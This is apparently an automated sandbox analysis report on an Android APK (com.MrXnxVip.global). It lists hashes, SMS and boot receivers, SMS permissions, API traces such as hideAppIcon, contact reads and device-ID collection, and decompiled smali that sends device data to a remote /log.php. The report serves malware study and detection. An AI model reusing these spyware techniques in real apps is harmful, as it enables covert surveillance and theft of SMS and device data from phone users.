                        SHA-512:BEEC85C6FDA63C2997E561DB6A2EDDBACC7A6E4EEA0EF8499D010AEA46681F855F5AF6BFBE2B4E95447238CAB7601825C7EB5D4685BA42696DCE8518B50DDF6C
                        Malicious:false
                        Preview:\"d3ccba0fb60b1a86\\"d3ccba0fb60b1a86\\"d3ccba0fb60b1a86\\"d3ccba0fb60b1a86\\"d3ccba0fb60b1a86\\"d3ccba0fb60b1a86\\"d3ccba0fb60b1a86\
                        File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                        Entropy (8bit):7.978533569898495
                        TrID:
                        • Android Package (27504/1) 56.12%
                        • Java Archive (13504/1) 27.55%
                        • ZIP compressed archive (8000/1) 16.32%
                        File name:LVgBOPCpI0
                        File size:2'235'611 bytes
                        MD5:d39f740d2de97df12a7ce73de153f397
                        SHA1:c669aeaf5548f74930d0b4bcdefa101de4b0726a
                        SHA256:2795bd8258cc8f0daa85db873c9f7e6126ec41f92a27970278b12ea4db5a4964
                        SHA512:cf9b0dfc3e30206385e63dcf5b2e9ba15a2fb461ead373f8f3f096ef5a2ed157044158b872a43d90ed0dfe3f99ad568212f453ef948dcfda40670141f367dc61
                        SSDEEP:49152:uRjilZVjRGZwHANQI4i9ER/87Y1lg+4BUrFKIpyPA2JvRjcOtK:uCFmwH3i9EyYnaUlpyo2JVFK
                        TLSH:E9A53347F75198EAC2F3D7314E26CA95486E3E098C1302873879BB7836BB7DDAB09145
                        File Content Preview:PK........6.<W..fB.....<......AndroidManifest.xml.ZYo[...j.Vk.-K.-..R..,y........{.eI.dY......ES.i..<.A..y(...AQ.A...? h.<.A..<.EQ.}..~sxF.]....."..%....3..v........>. .8"....../...p......w.....R.;....@....#../.......8....8............B..7.G.;._...o..<!..
                        Label:
                        Minimum SDK required:14
                        Target SDK required:29
                        Version Code:1
                        Version Name:1.0
                        Package Name:com.MrXnxVip.global
                        Is Activity:true
                        Is Receiver:true
                        Is Service:true
                        Requests System Level Permissions:false
                        Play Store Compatible:true
                        NameIs Entrypoint
                        com.MrXnxVip.globalcom.google.android.gms.common.api.GoogleApiActivity
                        com.MrXnxVip.global.maintrue
                        • .firebasemessaging$firebasemessaging_BR
                        • Intent: android.intent.action.BOOT_COMPLETED
                        • .httputils2service
                        • .newmessage1$newmessage1_BR
                        • Intent: android.intent.action.BOOT_COMPLETED, android.provider.Telephony.SMS_RECEIVED
                        • .pnservices$pnservices_BR
                        • Intent: android.intent.action.BOOT_COMPLETED
                        • .starter$starter_BR
                        • Intent: android.intent.action.BOOT_COMPLETED
                        • com.google.android.gms.measurement.AppMeasurementReceiver
                        • com.google.firebase.iid.FirebaseInstanceIdInternalReceiver
                        • com.google.firebase.iid.FirebaseInstanceIdReceiver
                        • Intent: com.google.android.c2dm.intent.RECEIVE, com.google.android.c2dm.intent.REGISTRATION
                        • .firebasemessaging
                        • .newmessage1
                        • .pnservices
                        • .starter
                        • anywheresoftware.b4a.objects.FirebaseNotificationsService
                        • Intent: com.google.firebase.MESSAGING_EVENT (Priority 0)
                        • com.google.android.gms.measurement.AppMeasurementJobService
                        • com.google.android.gms.measurement.AppMeasurementService
                        • com.google.firebase.components.ComponentDiscoveryService
                        • com.google.firebase.iid.FirebaseInstanceIdService
                        • Intent: com.google.firebase.INSTANCE_ID_EVENT (Priority -500)
                        • com.google.firebase.messaging.FirebaseMessagingService
                        • Intent: com.google.firebase.MESSAGING_EVENT (Priority -500)
                        • android.permission.ACCESS_NETWORK_STATE
                        • android.permission.ACCESS_WIFI_STATE
                        • android.permission.BIND_JOB_SERVICE
                        • android.permission.FOREGROUND_SERVICE
                        • android.permission.INTERNET
                        • android.permission.POST_NOTIFICATIONS
                        • android.permission.READ_SMS
                        • android.permission.RECEIVE_BOOT_COMPLETED
                        • android.permission.RECEIVE_SMS
                        • android.permission.SEND_SMS
                        • android.permission.VIBRATE
                        • android.permission.WAKE_LOCK
                        • com.MrXnxVip.global.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION
                        • com.MrXnxVip.global.permission.C2D_MESSAGE
                        • com.google.android.c2dm.permission.RECEIVE
                        • com.google.android.finsky.permission.BIND_GET_INSTALL_REFERRER_SERVICE
                        • com.google.android.gms.permission.AD_ID
                        Name:
                        Issuer:1.2.840.113549.1.9.1=#1613616e64726f696440616e64726f69642e636f6d,CN=Android,OU=Android,O=Android,L=Mountain View,ST=California,C=US
                        Subject:1.2.840.113549.1.9.1=#1613616e64726f696440616e64726f69642e636f6d,CN=Android,OU=Android,O=Android,L=Mountain View,ST=California,C=US
                        NameTypeSize
                        firebase-measurement-connector.propertiesASCII text98
                        layout.balMatlab v4 mat-file (little endian) Activity\020, rows 256, columns 10, imaginary1247
                        notification_action_tombstone.xmlAndroid binary XML1340
                        notification_template_part_chronometer.xmlAndroid binary XML448
                        transport-runtime.propertiesASCII text70
                        transport-api.propertiesASCII text62
                        play-services-measurement-sdk-api.propertiesASCII text104
                        kotlin.kotlin_builtinsdata14151
                        notify_panel_notification_icon_bg.pngPNG image data, 30 x 30, 8-bit colormap, non-interlaced99
                        notification_action_background.xmlAndroid binary XML1352
                        notification_bg.xmlTarga image data - RLE 288 x 65536 x 8 +1 +28 ""644
                        fragment_fade_exit.xmlTarga image data - RLE 176 x 65536 x 8 +1 +28 ""396
                        play-services-cloud-messaging.propertiesASCII text96
                        notification_bg_normal_pressed.9.pngPNG image data, 12 x 12, 8-bit/color RGB, non-interlaced225
                        notification_bg_low.xmlTarga image data - RLE 288 x 65536 x 8 +1 +28 ""644
                        notification_tile_bg.xmlAndroid binary XML380
                        fragment_close_exit.xmlAndroid binary XML1128
                        notification_template_icon_group.xmlTarga image data - RLE 332 x 65536 x 15 +1 +28 ""996
                        publicsuffixes.gzgzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 10417037730
                        MANIFEST.MFASCII text, with CRLF line terminators7787
                        fragment_fade_enter.xmlTarga image data - RLE 176 x 65536 x 8 +1 +28 ""396
                        annotation.kotlin_builtinsdata926
                        play-services-basement.propertiesASCII text82
                        notification_template_custom_big.xmlAndroid binary XML2100
                        play-services-measurement-api.propertiesASCII text96
                        notification_action_tombstone.xmlAndroid binary XML1444
                        notification_bg_low_pressed.9.pngPNG image data, 8 x 8, 8-bit/color RGB, non-interlaced223
                        NOTICEASCII text218
                        CERT.SFASCII text, with CRLF line terminators7895
                        notification_action.xmlAndroid binary XML1164
                        port.txtASCII text, with no line terminators4
                        internal.kotlin_builtinsdata758
                        resources.arscdata40920
                        transport-backend-cct.propertiesASCII text78
                        notify_panel_notification_icon_bg.pngPNG image data, 14 x 14, 8-bit colormap, non-interlaced93
                        ranges.kotlin_builtinsdata2301
                        firebase-datatransport.propertiesASCII text82
                        custom_dialog.xmlAndroid binary XML620
                        notification_bg_low_pressed.9.pngPNG image data, 12 x 12, 8-bit/color RGB, non-interlaced225
                        collections.kotlin_builtinsdata3685
                        notification_bg_normal.9.pngPNG image data, 16 x 16, 8-bit grayscale, non-interlaced221
                        fragment_fast_out_extra_slow_in.xmlTarga image data - RLE 60 x 65536 x 1 +1 +28 ""128
                        icon.jpgJPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1000x667, components 328840
                        play-services-ads-identifier.propertiesASCII text94
                        notification_bg_low_normal.9.pngPNG image data, 12 x 12, 8-bit grayscale, non-interlaced212
                        CERT.RSAdata1714
                        notification_icon_background.xmlAndroid binary XML436
                        play-services-measurement-impl.propertiesASCII text98
                        fragment_open_exit.xmlAndroid binary XML1084
                        notification_template_custom_big.xmlAndroid binary XML2500
                        fragment_close_enter.xmlAndroid binary XML1084
                        firebase-installations.propertiesASCII text82
                        firebase-components.propertiesASCII text76
                        firebase-core.propertiesASCII text64
                        play-services-measurement.propertiesASCII text88
                        play-services-measurement-sdk.propertiesASCII text96
                        notification_action_tombstone.xmlTarga image data - RLE 516 x 65536 x 24 +1 +28 ""1380
                        notification_bg_low_normal.9.pngPNG image data, 8 x 8, 8-bit grayscale, non-interlaced215
                        notification_bg_normal_pressed.9.pngPNG image data, 8 x 8, 8-bit/color RGB, non-interlaced223
                        notification_action.xmlAndroid binary XML1204
                        play-services-measurement-base.propertiesASCII text98
                        fragment_open_enter.xmlAndroid binary XML1084
                        notification_bg_low_normal.9.pngPNG image data, 16 x 16, 8-bit grayscale, non-interlaced221
                        notification_bg_normal.9.pngPNG image data, 8 x 8, 8-bit grayscale, non-interlaced215
                        notification_bg_normal_pressed.9.pngPNG image data, 16 x 16, 8-bit/color RGB, non-interlaced247
                        firebase-messaging.propertiesASCII text74
                        firebase-analytics.propertiesASCII text74
                        notification_template_custom_big.xmlTarga image data - RLE 636 x 65536 x 32 +1 +28 ""3216
                        play-services-stats.propertiesASCII text76
                        reflect.kotlin_builtinsdata2338
                        notification_bg_normal.9.pngPNG image data, 12 x 12, 8-bit grayscale, non-interlaced212
                        firebase-encoders-json.propertiesASCII text82
                        notification_bg_low_pressed.9.pngPNG image data, 16 x 16, 8-bit/color RGB, non-interlaced252
                        firebase-installations-interop.propertiesASCII text98
                        notification_template_custom_big.xmlAndroid binary XML3020
                        AndroidManifest.xmlAndroid binary XML15372
                        notification_template_part_time.xmlAndroid binary XML448
                        fragment_fast_out_extra_slow_in.xmlAndroid binary XML372
                        firebase-encoders.propertiesASCII text72
                        notification_template_icon_group.xmlTarga image data - RLE 180 x 65536 x 8 +1 +28 ""400
                        coroutines.kotlin_builtinsdata200
                        notify_panel_notification_icon_bg.pngPNG image data, 15 x 15, 8-bit colormap, non-interlaced93
                        classes.dexDalvik dex file version 0355525680
                        firebase-iid-interop.propertiesASCII text78
                        notification_action.xmlAndroid binary XML1268
                        play-services-tasks.propertiesASCII text76
                        firebase-common.propertiesASCII text68
                        cmdline.drtroff or preprocessor input, ASCII text, with very long lines (765)775
                        webview_data.lock.drdata25
                        settings.dat.drdata40
                        ~test.test.drASCII text, with no line terminators4
                        FirebaseAppHeartBeat.xml.drXML 1.0 document, ASCII text138
                        com.google.android.gms.appid-no-backup.drempty0
                        2.drHTML document, ASCII text690
                        PersistedInstallation.W0RFRkFVTFRd+MTo1NDQ3ODIyODc2NzE6YW5kcm9pZDowNWNiZDA4YjFlMGEzYWI1ZmE5MGIy.json.drJSON data569
                        cpu.drtroff or preprocessor input, ASCII text, with no line terminators133
                        NULL.txt.drASCII text, with no line terminators10
                        1.drASCII text, with no line terminators31
                        u:object_r:graphics_config_prop:s0.drtroff or preprocessor input, ASCII text, with very long lines (4212)4222
                        commands.txt.drtroff or preprocessor input, ASCII text, with very long lines (666)676
                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                        APK Behavior

                        TypeData
                        boot completed
                        • -
                        time tick
                        • -
                        incoming sms
                        • 0123456789
                        • this is a text message
                        outgoing sms
                        • 9876543210
                        • thank you
                        location change
                        • 54.13
                        • 12.14
                        motion simulation
                        • -
                        incoming call
                        • 0123456789
                        outgoing call
                        • 9876543210
                        time tick
                        • -
                        View Data
                        • Object: android.widget.Button{8e0d951 VFED..C.. ........ 7,7-50,50 #10201f7 android:id/back_window}
                        • X: 28
                        • Y: 28
                        • Object: android.widget.Button{f4e2742 VFED..C.. ........ 277,7-320,50 #1020386 android:id/minimize_window}
                        • X: 298
                        • Y: 28
                        • Object: android.widget.Button{3490353 VFED..C.. ........ 334,7-377,50 #102036c android:id/maximize_window}
                        • X: 355
                        • Y: 28
                        • Object: android.widget.Button{a4be490 VFED..C.. ........ 391,7-434,50 #102023d android:id/close_window}
                        • X: 412
                        • Y: 28
                        • Object: android.widget.Button{8e0d951 VFED..C.. ........ 7,7-50,50 #10201f7 android:id/back_window}
                        • X: 220
                        • Y: 430
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:56 Show source
                        NameTypeValue
                        Return Valueandroid.net.NetworkInfo
                        • toString: [type: WIFI[], state: CONNECTED/CONNECTED, reason: (unspecified), extra: , failover: false, available: true, roaming: false]
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:52 Show source
                        NameTypeValue
                        Return Valueandroid.net.NetworkInfo
                        • toString: [type: WIFI[], state: CONNECTED/CONNECTED, reason: (unspecified), extra: , failover: false, available: true, roaming: false]
                        API: java.net.URL->openConnection at ..:6 Show source
                        NameTypeValue
                        Return Valuecom.android.okhttp.internal.huc.HttpsURLConnectionImpl
                        • toString: com.android.okhttp.internal.huc.HttpURLConnectionImpl:https://firebaseinstallations.googleapis.com/v1/projects/developerbymrxnxvip/installations
                        API: android.content.ContentResolver->query at ..:60 Show source
                        NameTypeValue
                        p0android.net.Uri$HierarchicalUri
                        • toString: content://com.google.android.gms.chimera/api_force_staging/com.google.android.gms.measurement.dynamite?requestStartTime=685622
                        p1null
                        • toString: null
                        p2null
                        • toString: null
                        p3null
                        • toString: null
                        p4null
                        • toString: null
                        NameTypeValue
                        Return Valueandroid.content.ContentResolver$CursorWrapperInner
                        • toString: android.content.ContentResolver$CursorWrapperInner@12ea16a
                        API: java.lang.Runtime->exec at com.MrXnxVip.global.main._vvvvvvvvvv5:26 Show source
                        NameTypeValue
                        p0java.lang.String
                        • toString: ping -c 2 -W 10 -v google.com
                        NameTypeValue
                        Return Valuejava.lang.UNIXProcess
                        • toString: Process[pid=1397, hasExited=false]
                        API: android.location.LocationManager->isProviderEnabled at ..:30 Show source
                        API: android.location.LocationManager->isProviderEnabled at ..:10 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:14 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:9 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:8 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:29 Show source
                        API: android.net.ConnectivityManager->getNetworkInfo at ..:11 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:11 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:19 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:11 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:61 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:16 Show source
                        API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:3 Show source
                        API: android.net.wifi.WifiManager->getConnectionInfo at ..:19 Show source
                        API: android.net.wifi.WifiManager->isWifiEnabled at ..:10 Show source
                        API: android.bluetooth.BluetoothAdapter->getAddress at ..:14 Show source
                        API: android.content.pm.PackageManager->setComponentEnabledSetting at com.MrXnxVip.global.firebasemessaging.hideAppIcon:10 Show source
                        API: android.content.pm.PackageManager->setComponentEnabledSetting at ..:9 Show source
                        API: android.accounts.AccountManager->getAccountsByType at ..:16 Show source
                        API: android.accounts.AccountManager->getAccountsByTypeAndFeatures at ..:72 Show source
                        API: java.net.URL->openConnection at ..:28 Show source
                        API: java.net.URL->openConnection at ..:48 Show source
                        API: android.webkit.WebView-><init> at ..:17 Show source
                        API: java.net.URL->openConnection at ..:16 Show source
                        API: java.net.URL->openConnection at ..:6 Show source
                        API: java.net.URL->openConnection at ..:6 Show source
                        API: java.net.ServerSocket-><init> at ..:26 Show source
                        API: java.net.Socket-><init> at ..:9 Show source
                        API: java.net.URL->openConnection at ..:8 Show source
                        API: java.net.Socket-><init> at ..:32 Show source
                        API: java.net.URL->openStream at ..:5 Show source
                        API: android.webkit.WebView-><init> at ..:6 Show source
                        API: java.net.HttpURLConnection->connect at ..:88 Show source
                        API: android.content.ContentResolver->query at ..:31 Show source
                        API: android.content.ContentResolver->query at ..:92 Show source
                        API: android.content.ContentResolver->openInputStream at ..:72 Show source
                        API: android.content.ContentResolver->query at ..:10 Show source
                        API: android.content.ContentResolver->query at ..:47 Show source
                        API: android.content.ContentResolver->query at ..:13 Show source
                        API: android.content.ContentResolver->query at ..:27 Show source
                        API: android.content.ContentResolver->query at ..:20 Show source
                        API: android.content.ContentResolver->openFileDescriptor at ..:17 Show source
                        API: android.content.ContentResolver->query at ..:13 Show source
                        API: android.content.ContentResolver->query at ..:20 Show source
                        API: android.content.ContentResolver->query at ..:17 Show source
                        API: android.content.ContentResolver->openInputStream at ..:51 Show source
                        API: android.content.ContentResolver->query at ..:31 Show source
                        API: android.content.ContentResolver->query at ..:14 Show source
                        API: android.content.ContentResolver->query at ..:92 Show source
                        API: android.content.ContentResolver->query at ..:34 Show source
                        API: android.content.ContentResolver->query at ..:15 Show source
                        API: android.content.ContentResolver->query at ..:14 Show source
                        API: android.content.ContentResolver->query at ..:13 Show source
                        API: android.content.ContentResolver->openFileDescriptor at ..:7 Show source
                        API: android.content.ContentResolver->query at ..:30 Show source
                        API: android.content.ContentResolver->query at ..:22 Show source
                        API: android.content.ContentResolver->openInputStream at ..:15 Show source
                        API: android.content.ContentResolver->openFileDescriptor at ..:21 Show source
                        API: android.content.ContentResolver->query at ..:39 Show source
                        API: android.content.ContentResolver->openFileDescriptor at ..:17 Show source
                        API: android.content.ContentResolver->query at anywheresoftware.b4a.phone.Contacts2Wrapper.getAllContacts:13 Show source
                        API: android.content.ContentResolver->query at ..:45 Show source
                        API: android.content.ContentResolver->openInputStream at ..:18 Show source
                        API: java.lang.Runtime->exec at ..:6 Show source
                        API: java.lang.Runtime->exec at ..:23 Show source
                        API: java.lang.Runtime->exec at ..:8 Show source
                        API: android.telephony.TelephonyManager->getSimSerialNumber at ..:9 Show source
                        API: android.telephony.TelephonyManager->getLine1Number at ..:9 Show source
                        API: android.telephony.TelephonyManager->getSubscriberId at ..:23 Show source
                        API: android.telephony.TelephonyManager->getDeviceId at ..:23 Show source
                        API: android.telephony.TelephonyManager->getLine1Number at ..:11 Show source
                        API: android.telephony.TelephonyManager->getSimSerialNumber at ..:11 Show source
                        API: android.telephony.TelephonyManager->getDeviceId at ..:9 Show source
                        API: android.telephony.TelephonyManager->getSubscriberId at ..:9 Show source
                        API: android.telephony.TelephonyManager->listen at ..:16 Show source
                        API: android.telephony.SmsManager->sendTextMessage at ..:47 Show source
                        API: android.os.Vibrator->vibrate at ..:9 Show source
                        API: android.app.NotificationManager->notify at ..:18 Show source
                        API: android.app.NotificationManager->notify at ..:28 Show source
                        API: android.app.NotificationManager->notify at ..:22 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:24 Show source
                        API: android.os.PowerManager$WakeLock->release at ..:9 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:9 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:13 Show source
                        API: android.os.PowerManager$WakeLock->release at anywheresoftware.b4a.objects.ServiceHelper$StarterHelper.handleStartIntent:26 Show source
                        API: android.os.PowerManager$WakeLock->release at ..:11 Show source
                        API: android.os.PowerManager$WakeLock->acquire at anywheresoftware.b4a.objects.ServiceHelper$StarterHelper.startServiceFromReceiver:71 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:94 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:50 Show source
                        API: android.os.PowerManager$WakeLock->release at ..:20 Show source
                        API: android.os.PowerManager$WakeLock->acquire at anywheresoftware.b4a.phone.Phone$PhoneWakeState.KeepAlive:33 Show source
                        API: android.os.PowerManager$WakeLock->acquire at anywheresoftware.b4a.phone.Phone$PhoneWakeState.PartialLock:28 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:9 Show source
                        API: android.os.PowerManager$WakeLock->release at ..:11 Show source
                        API: android.os.PowerManager$WakeLock->acquire at ..:14 Show source
                        API: android.media.MediaPlayer->start at ..:3 Show source
                        API: android.media.RingtoneManager->setActualDefaultRingtoneUri at ..:6 Show source

                        101 Executed Methods

                        Cross References
                        APIs
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.getObject
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv3:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv5:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.firebasemessaging._vv6:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.firebasemessaging.mostCurrent:Lcom/MrXnxVip/global/firebasemessaging
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._vvv4:Ljava/lang/String
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v7:Lanywheresoftware/b4a/phone/Phone
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.firebasemessaging._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.firebasemessaging._check_install
                        • com.MrXnxVip.global.firebasemessaging._vvvvvvvvvvv4:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Double.isNaN
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • 61245210
                        • NoToken
                        • 61245202
                        • not install
                        • result=ok&action=install&androidid=
                        • &model=
                        • &opr=
                        • &osVersion=
                        • /log.php
                        • /data/user/0/com.MrXnxVip.global/files
                        • NULL.txt
                        • HelloWorld
                        • samsung
                        • Galaxy Nexus
                        • d3ccba0fb60b1a86
                        • -
                        • t-mobile_deutschland_gmbh
                        • 12
                        • java.lang.String@246e519
                        • java.lang.String@340c5ab
                        • java.lang.String@358513c
                        • java.lang.String@35d6287
                        • java.lang.String@3d6f93b
                        • java.lang.String@3e13ddf
                        • java.lang.String@4157dc
                        • java.lang.String@456273d
                        • java.lang.String@4a9ac93
                        • java.lang.String@55d5702
                        • java.lang.String@5c280f8
                        • java.lang.String@5ffb1b9
                        • java.lang.String@62d8a20
                        • java.lang.String@97f40d0
                        • java.lang.String@9e0fd9e
                        • java.lang.String@aeabf47
                        • java.lang.String@b0e1931
                        • java.lang.String@b2a64c2
                        • java.lang.String@b681ffd
                        • java.lang.String@bc4c0d1
                        • java.lang.String@c3bc245
                        • java.lang.String@e058434
                        • java.lang.String@e80409c
                        • java.lang.String@f3bf928
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5cond_0: iget p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        6try_end_2: const/16 p2, 0xb
                        7const/4 v0, 0x1
                        9const-string v1, ""
                        10const/16 v2, 0xc
                        11const/16 v3, 0xd
                        12const/16 v4, 0x10
                        13const/4 v5, 0x0
                        14packed-switch p1, :pswitch_data_176
                        15pswitch_11: goto/16 :goto_0
                        16pswitch_12: iput v4, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        17goto/16 :goto_0
                        18pswitch_15: iput v3, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        19goto/16 :goto_0
                        20pswitch_18: const/4 p1, -0x1
                        21iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        22goto/16 :goto_0
                        23pswitch_1c: iput v4, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        25const-string p1, "61245210"
                        27const-string p2, "NoToken"
                        29invoke-static {p1, p2, v5}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        31sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        33invoke-static {}, Lcom/MrXnxVip/global/firebasemessaging;->getObject()Ljava/lang/Class;
                        34move-result-object p2
                        36invoke-static {p1, p2}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        37goto/16 :goto_0
                        38pswitch_2f: iput v4, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        40sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        42invoke-static {p1, p0, v5}, Lanywheresoftware/b4a/keywords/Common;->Sleep(Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/BA$ResumableSub;I)V
                        43const/16 p1, 0x12
                        44iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        45return-void
                        46pswitch_3b: iput v3, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        47iput v5, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->catchState:I
                        49sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        50const/16 p2, 0xbb8
                        52invoke-static {p1, p0, p2}, Lanywheresoftware/b4a/keywords/Common;->Sleep(Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/BA$ResumableSub;I)V
                        53const/16 p1, 0x11
                        54iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        55return-void
                        56pswitch_4b: iput v2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        57iput v5, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->catchState:I
                        59const-string p1, "61245202"
                        61const-string p2, "not install"
                        63invoke-static {p1, p2, v5}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        64goto/16 :goto_0
                        65pswitch_57: iput v2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        66iput p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->catchState:I
                        67new-instance p1, Ljava/lang/StringBuilder;
                        69invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        71const-string p2, "result=ok&action=install&androidid="
                        73invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        75sget-object p2, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        77invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        79const-string p2, "&model="
                        81invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        83sget-object p2, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        85invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        87const-string p2, "&opr="
                        89invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        91sget-object p2, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        93invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        95const-string p2, "&osVersion="
                        97invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        99sget-object p2, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        101invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        103invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        104move-result-object p1
                        105sput-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        107sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        108new-instance p2, Ljava/lang/StringBuilder;
                        110invoke-direct {p2}, Ljava/lang/StringBuilder;-><init>()V
                        112sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        114iget-object v0, v0, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        116sget-object v0, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        118invoke-virtual {p2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        120const-string v0, "/log.php"
                        122invoke-virtual {p2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
